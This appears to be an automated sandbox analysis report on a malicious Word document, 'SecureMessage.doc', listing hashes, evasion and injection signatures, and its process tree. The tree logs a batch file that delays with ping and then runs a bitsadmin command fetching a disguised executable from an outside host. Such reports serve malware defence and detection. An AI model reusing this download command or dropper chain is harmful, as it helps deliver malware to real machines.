Analysis
-
max time kernel
107s -
max time network
138s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
13-10-2021 15:11
Static task
static1
Behavioral task
behavioral1
Sample
SecureMessage.doc
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
SecureMessage.doc
Resource
win10-en-20210920
General
-
Target
SecureMessage.doc
-
Size
82KB
-
MD5
b6bf42a76eb8cea70cb0a9ba2b8f31d5
-
SHA1
fc27036fefb683e218140e1f0af78f23d711a866
-
SHA256
3d808601a47c9ae6c1c121a5eb3297ebb8a75f3663cc425f92fc541b90c8200e
-
SHA512
8c0d9633420537bc3c8c16114959fd9648a31f7ca1fab536a67cd0ca6acb039769f9b0a4845679f32616dcbf16e1efbe6bbed9a53be43dc35cf5a06017e847e0
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1052 2132 cmd.exe WINWORD.EXE -
Deletes itself 1 IoCs
Processes:
WINWORD.EXEpid process 2132 WINWORD.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2132 WINWORD.EXE 2132 WINWORD.EXE -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
WINWORD.EXEpid process 2132 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
WINWORD.EXEpid process 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE 2132 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 2132 wrote to memory of 1052 2132 WINWORD.EXE cmd.exe PID 2132 wrote to memory of 1052 2132 WINWORD.EXE cmd.exe PID 1052 wrote to memory of 1968 1052 cmd.exe PING.EXE PID 1052 wrote to memory of 1968 1052 cmd.exe PING.EXE PID 1052 wrote to memory of 464 1052 cmd.exe bitsadmin.exe PID 1052 wrote to memory of 464 1052 cmd.exe bitsadmin.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecureMessage.doc" /o ""1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c C:\Users\Admin\AppData\Roaming\peppercornensuedsolicit.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping -n 30 127.0.0.13⤵
- Runs ping.exe
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer backup /download /priority high https://usdata.estoreseller.com/images/logoimage.png "C:\Users\Admin\AppData\Roaming\zspriteimperturbably.exe"3⤵
- Download via BitsAdmin
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\peppercornensuedsolicit.batMD5
3c5d37bcc0200c0c5358e989fee78aa6
SHA12460dcf0890ddca0aac438bcbec80aea4ba1c633
SHA2564dc218c92aa2b223437b34295ceb788ab098a6331d574408b024e8503f26d93c
SHA512c4d890c110140aa980756a3fdfc490805079132d0e17b35cbb6bdfda6682c8bd166de3d4c4246230ef4dc9453d616d8cff38c5b09f47f84ed44ef1a6b4eb5d30
-
memory/464-319-0x0000000000000000-mapping.dmp
-
memory/1052-281-0x0000000000000000-mapping.dmp
-
memory/1968-284-0x0000000000000000-mapping.dmp
-
memory/2132-116-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmpFilesize
64KB
-
memory/2132-115-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmpFilesize
64KB
-
memory/2132-117-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmpFilesize
64KB
-
memory/2132-118-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmpFilesize
64KB
-
memory/2132-119-0x000001B197040000-0x000001B197042000-memory.dmpFilesize
8KB
-
memory/2132-120-0x000001B197040000-0x000001B197042000-memory.dmpFilesize
8KB
-
memory/2132-121-0x00007FFDD9650000-0x00007FFDD9660000-memory.dmpFilesize
64KB
-
memory/2132-122-0x000001B197040000-0x000001B197042000-memory.dmpFilesize
8KB